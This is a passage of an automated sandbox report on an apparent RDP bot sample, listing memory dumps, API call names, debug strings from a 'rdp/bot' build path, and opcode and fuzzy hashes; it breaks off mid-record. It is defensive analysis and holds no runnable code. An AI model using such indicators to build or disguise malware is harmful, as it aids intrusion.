                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 43a66c7a40e50f2705813a1cfc1b0f86665661e007711cb612dbde3ccfe57ede
                    • Instruction ID: 100a31e855ac35467210143eb3b9aa4aaf5623f089f314565573440b2f2f62bd
                    • Opcode Fuzzy Hash: 43a66c7a40e50f2705813a1cfc1b0f86665661e007711cb612dbde3ccfe57ede
                    • Instruction Fuzzy Hash: 04F09662A1878642E5538F18BC403796254FF457E4F598236DF4D87690EF2CF985E700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 4431de4f8124a7a94acb3b6e3692c454a9cb3ecc2e31de966fdae785209df37a
                    • Instruction ID: eef4070d774a0e3ff1dbb1ae9263f11ce3c6cf47ec5e530c2be01453ede4519c
                    • Opcode Fuzzy Hash: 4431de4f8124a7a94acb3b6e3692c454a9cb3ecc2e31de966fdae785209df37a
                    • Instruction Fuzzy Hash: 52F0F62260CB0A41E5569F8CBC423B5A358EF447DDF041236DF2D466D1DF3DD98A9300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: df9030146c483eeb1c42cd23e8c33ca0e0a20dd8f7b5618f4459904781ca7a31
                    • Instruction ID: c812bb573956c658634088bc6e4d75ac5a506c9f6f57d2c59da15610f4592840
                    • Opcode Fuzzy Hash: df9030146c483eeb1c42cd23e8c33ca0e0a20dd8f7b5618f4459904781ca7a31
                    • Instruction Fuzzy Hash: 89F09C5260C70692E5619F88BC807B67354AF467D5F480276DF4D466A0EF3DDB499300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 84507be4a4de6d467d6f1ceb591116e6e33086f4e66504b08abdaae3ee9167ed
                    • Instruction ID: eca2cf48737985f710688437618f97a8a1ba8256b562f0fb1424e9f54add26dd
                    • Opcode Fuzzy Hash: 84507be4a4de6d467d6f1ceb591116e6e33086f4e66504b08abdaae3ee9167ed
                    • Instruction Fuzzy Hash: 48F0966262870782F652EF04BD80BB9E264FF407A4F880236ED5D466D1DF3DD9E99318
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 0ca799fca6bbcb1757cbcc2dcca85249b25f476f8fa3a6e87312bd06e934d07b
                    • Instruction ID: 3ad469e133cbf741c7e98f467054f27528fef1372f08fb528ad6300068a82333
                    • Opcode Fuzzy Hash: 0ca799fca6bbcb1757cbcc2dcca85249b25f476f8fa3a6e87312bd06e934d07b
                    • Instruction Fuzzy Hash: 58F0F622A0878642E5538F0CB8803757244BF407E4F494635DF5D46691EF3DD986B300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 5aa2f7c8573c3de0365c04b7b97fedeb54286f0fb7594e79099b212bd57f958c
                    • Instruction ID: 3cd975793e2593f46408d791bc155c68050fe39c0051fd6262389bd36191b347
                    • Opcode Fuzzy Hash: 5aa2f7c8573c3de0365c04b7b97fedeb54286f0fb7594e79099b212bd57f958c
                    • Instruction Fuzzy Hash: E3F0F022A0868642E6538F0CBC803B97244BF407E4F49463AEF5D46691EF3DDA8AB300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: b64ba499165d0bf9f2a6abbdea868e445e23a4ee5814657b89a818d1230dab7a
                    • Instruction ID: acbda8544bbe563e28de5675648f70b184f3252f1e5b5923a141e5ae3e835372
                    • Opcode Fuzzy Hash: b64ba499165d0bf9f2a6abbdea868e445e23a4ee5814657b89a818d1230dab7a
                    • Instruction Fuzzy Hash: F5F0F622A0878642E5538F0CBC803757244FF407E4F494536DF5D46691DF3DDA86B300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: b925a896082f3cbac8f85682289c0623576caa08c1e2f56db9f14118f2be1eb2
                    • Instruction ID: b0d9de61a816731c9345bbd97bc40bc011f2dbb4d13bec58fe18848e7f7ef728
                    • Opcode Fuzzy Hash: b925a896082f3cbac8f85682289c0623576caa08c1e2f56db9f14118f2be1eb2
                    • Instruction Fuzzy Hash: 39F0F622A0878642E5538F0CB8803757244BF407E4F494536DF5D46691DF3DD986B300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 56f8f947741124c32929831f6305df564f095b6d9a6d9a0b39bb5ff756825751
                    • Instruction ID: d163a41e2158c5c0ca51e3a5e43e51b2ad2e369288e8e6a8c2261f9dc8896303
                    • Opcode Fuzzy Hash: 56f8f947741124c32929831f6305df564f095b6d9a6d9a0b39bb5ff756825751
                    • Instruction Fuzzy Hash: C4F09662A0878642E6538F0CB8807757255BF407E4F494635DF5D46695DF3DD98AB300
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Sleepmemcpy
                    • String ID:
                    • API String ID: 1125407320-0
                    • Opcode ID: 992cbff283cf5bc95ae1a3ea0b4319c7fbf54e715062f432e6d1e15d965cf2f6
                    • Instruction ID: 9379432b5bc0e6ab582c44bcf956020c76fd09851529afa3726c9ddb959def9e
                    • Opcode Fuzzy Hash: 992cbff283cf5bc95ae1a3ea0b4319c7fbf54e715062f432e6d1e15d965cf2f6
                    • Instruction Fuzzy Hash: 1B315962E0C64292FA609BECE8A52787352AF447F0F18033AD77D067E1DE2CF555A650
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: Sleepmemcpy
                    • String ID:
                    • API String ID: 1125407320-0
                    • Opcode ID: b87abd954e14124bfefb60d04ef0fd2187e4f04c7771b26ba7a85592d234dd00
                    • Instruction ID: c6bc02626b61f004f88f23012105a7d6373844b016c3c864ea471cb8de1c5aaf
                    • Opcode Fuzzy Hash: b87abd954e14124bfefb60d04ef0fd2187e4f04c7771b26ba7a85592d234dd00
                    • Instruction Fuzzy Hash: 0E315C25E0D75B82FA6097EDE8882782355AFC1BF4F144331D77E46AE2DE2DA841D600
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Sleepmemcpy
                    • String ID:
                    • API String ID: 1125407320-0
                    • Opcode ID: 3d3b53d04c772b8df934e6e75b7e7394d6e1c1ef4915e661cc7242475e802ccf
                    • Instruction ID: 3b5380edf9031800730bb6fd5d6ffaf9694a42cf0b797924d49445e63259c68a
                    • Opcode Fuzzy Hash: 3d3b53d04c772b8df934e6e75b7e7394d6e1c1ef4915e661cc7242475e802ccf
                    • Instruction Fuzzy Hash: B8312B25E0868392F6325FACE8942782251AF443F0F214735DB7D466E5CE2CF98AF640
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: Sleepmemcpy
                    • String ID:
                    • API String ID: 1125407320-0
                    • Opcode ID: a353561d76903494636ec477018f7265d0b2c6ffd32db1de9122ce1526666027
                    • Instruction ID: d1a462df975887e93967b91da92761532a1896bcfd601919c564c3e66f57ef1c
                    • Opcode Fuzzy Hash: a353561d76903494636ec477018f7265d0b2c6ffd32db1de9122ce1526666027
                    • Instruction Fuzzy Hash: 2E31F520E0C60692F6305BEDAC8427A6251BF463F0F5007B6DF7D466F1DE2CEB459641
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Sleepmemcpy
                    • String ID:
                    • API String ID: 1125407320-0
                    • Opcode ID: 0cb8941dfc163a413c5ab916b78a3d17a0994cdb19c6253a22ed711d911a51f6
                    • Instruction ID: 0d92a77e8aa1d7bbe763f043219c3183562da79cfec2b515fd25baf78f50a1ac
                    • Opcode Fuzzy Hash: 0cb8941dfc163a413c5ab916b78a3d17a0994cdb19c6253a22ed711d911a51f6
                    • Instruction Fuzzy Hash: 30312120E1C68283F630AF2CE8C52792652AF457F0F650331EB7D566E3DE2DA9467781
                    APIs
                      • Part of subcall function 00007FF708871360: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF7088784AF), ref: 00007FF70887137E
                    • SleepEx.KERNEL32 ref: 00007FF7088788DC
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: HandleModuleSleep
                    • String ID:
                    • API String ID: 1071907932-0
                    • Opcode ID: 979f6ab677c7687cb865241237432280adb0046b4e29c36f948d58921f5010c4
                    • Instruction ID: 42503d3eec102efb5485b9cb306c0d88a7697186eca431e0569ea61cf4bacc54
                    • Opcode Fuzzy Hash: 979f6ab677c7687cb865241237432280adb0046b4e29c36f948d58921f5010c4
                    • Instruction Fuzzy Hash: 5B018621A2C64782F7A0B654EC58BB9E1A19F84384F940030D60E4B6D5DF7CD9A5C76C
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$Heap$FreeProcessfclosefread
                    • String ID:
                    • API String ID: 4240746492-0
                    • Opcode ID: 06b5753a0f2153fadecf8515356ede5123c149dc1559c95b793d2786b5db2776
                    • Instruction ID: 4f1bf4da1ef7500bc016ab6d28168ec8b1074fd4a039d5bebafc733a5b9c1dbb
                    • Opcode Fuzzy Hash: 06b5753a0f2153fadecf8515356ede5123c149dc1559c95b793d2786b5db2776
                    • Instruction Fuzzy Hash: B2E04801B3825301FE74E9691D40F75C5B12F59798F5A14308D0F566E9DF3DE8D15828
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$Heap$FreeProcessfclosefread
                    • String ID:
                    • API String ID: 4240746492-0
                    • Opcode ID: 5eb821edd3b4ac3d11fb5a8a8cf5f479bd344658574371c11ea2e3b3b9955ca5
                    • Instruction ID: a3708d60a38eff19bd0b99a0d506839cfcbc0c55b77baf3b3e6cc0e2ecec3955
                    • Opcode Fuzzy Hash: 5eb821edd3b4ac3d11fb5a8a8cf5f479bd344658574371c11ea2e3b3b9955ca5
                    • Instruction Fuzzy Hash: A9E04801B3825301FE74E9695D40F75C5B12F59798F5A14308D0F566E9DF3DE8D15828
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$Heap$FreeProcessfclosefread
                    • String ID:
                    • API String ID: 4240746492-0
                    • Opcode ID: eca8601a8072f10b742a6ea828dc9ef14cccec53e02c73ff1a62bffbaf347bab
                    • Instruction ID: 68ef91e92cc9ef862c984d52b9bd563a9b14a77c78ccece678873dd911b65409
                    • Opcode Fuzzy Hash: eca8601a8072f10b742a6ea828dc9ef14cccec53e02c73ff1a62bffbaf347bab
                    • Instruction Fuzzy Hash: 93E0D801B3814201FE70E9691D40F35C5B12F44798F5A14308D0F162EADF3DE8D10828
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$Heap$FreeProcessfclosefread
                    • String ID:
                    • API String ID: 4240746492-0
                    • Opcode ID: 0f4c820b4593ff6fa6eb4d1d7b985b18c40b22b35b228e74236585271f35355d
                    • Instruction ID: 977957e8fe4b24355507415ca4a2630192d6375e44585db992cc92056388b40b
                    • Opcode Fuzzy Hash: 0f4c820b4593ff6fa6eb4d1d7b985b18c40b22b35b228e74236585271f35355d
                    • Instruction Fuzzy Hash: E1E04801B3825305FE74E9691D40F75C5B12F59798F5A14308D0F566EAEF3DE8D15828
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$Heap$FreeProcessfclosefread
                    • String ID:
                    • API String ID: 4240746492-0
                    • Opcode ID: 93779f5a2cdb3e04165489ec7973de93b07f8438cdc681d7751f1fbd96d9f5de
                    • Instruction ID: a1ab9fe0082c476625dc79765294fbc714d4f94a189762b761c58e28b07fb768
                    • Opcode Fuzzy Hash: 93779f5a2cdb3e04165489ec7973de93b07f8438cdc681d7751f1fbd96d9f5de
                    • Instruction Fuzzy Hash: E9E0D801B3825301FE70E9690D40F36C5B12F48798F5A14308C0F162EADF3DE8D10828
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$Heap$FreeProcessfclosefread
                    • String ID:
                    • API String ID: 4240746492-0
                    • Opcode ID: d9839dda6aa00f83f1b280c0522c91c52a71f8d5d8a1992868c318b81a1566b1
                    • Instruction ID: 8e27d0f47083ca5342937888bdc9816e1a8cd118ddc3f775579bcbd26d6e9a0d
                    • Opcode Fuzzy Hash: d9839dda6aa00f83f1b280c0522c91c52a71f8d5d8a1992868c318b81a1566b1
                    • Instruction Fuzzy Hash: 6BE04801B3825301FE74E9694D40F75C5B13F59798F5A14308D0F566E9DF3DE4D15828
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: ServiceStatus
                    • String ID:
                    • API String ID: 3969395364-0
                    • Opcode ID: 4993fdc76b1177e06be1b464f55a433b82611d2e99cbe8385cbffbaa458d3ac6
                    • Instruction ID: b197ea03e40f75579a6d5dd0a79cf8e5f43d390f25677f54c6fe679161349bfd
                    • Opcode Fuzzy Hash: 4993fdc76b1177e06be1b464f55a433b82611d2e99cbe8385cbffbaa458d3ac6
                    • Instruction Fuzzy Hash: 56D06C74D6A602C6E708FF06EC85824E6B0BF89741BD09036D21C523A0DF3CA1B98B29
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: rand_s
                    • String ID:
                    • API String ID: 863162693-0
                    • Opcode ID: 34b79ae6e1dd47e5b081b7fbe00c12fbd074ba990cf07bcb48e6a06ddf1fcfa5
                    • Instruction ID: 789e0f06264ee1530cfe59aeefb39008af00dd14ada936998c4d8cac42f24c5e
                    • Opcode Fuzzy Hash: 34b79ae6e1dd47e5b081b7fbe00c12fbd074ba990cf07bcb48e6a06ddf1fcfa5
                    • Instruction Fuzzy Hash: 79C00226A185408AD620EB25E845659A770FB98308FD04111E65D826A4CB3CD62ACF14
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: CriticalEnterSection
                    • String ID:
                    • API String ID: 1904992153-0
                    • Opcode ID: 7abd05a5a67c31e03c5b12fe05f629d692a795e69a910426a5662404033e003a
                    • Instruction ID: 3d5bc5f1e61b4b7914237302588f4b708a614d2a2b3fff146f4abbe661271ea4
                    • Opcode Fuzzy Hash: 7abd05a5a67c31e03c5b12fe05f629d692a795e69a910426a5662404033e003a
                    • Instruction Fuzzy Hash: 13C02B90F1828283FF08AF7ABCD203402209FDC780F001038DB5E43392CE2CA8D4A300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Heap$Process$AdaptersAllocInfo$Free
                    • String ID: (adapter_num != NULL)$(pref_adapter_type != NULL)$H:/Projects/rdp/bot/codebase/net.c$[D] (%s) -> Adapter detected(name=%s,desc=%s,type=%d)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetAdaptersInfo failed(res=%08lx)$[E] (%s) -> GetBestInterface failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$net_info
                    • API String ID: 2437369060-1325175688
                    • Opcode ID: 43c9ba1fab3bd22d021c8fc96399c174167b883a95ea790a58ad8f02497e1c4e
                    • Instruction ID: baf784a1c666d460c03a2a73f2976a077fff7dca1f888da68c15cc5039edb998
                    • Opcode Fuzzy Hash: 43c9ba1fab3bd22d021c8fc96399c174167b883a95ea790a58ad8f02497e1c4e
                    • Instruction Fuzzy Hash: 57516D61A0E647A5FF209FA8E8602B87360AF447C4F484036EB4E46E96EE7CF945C751
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
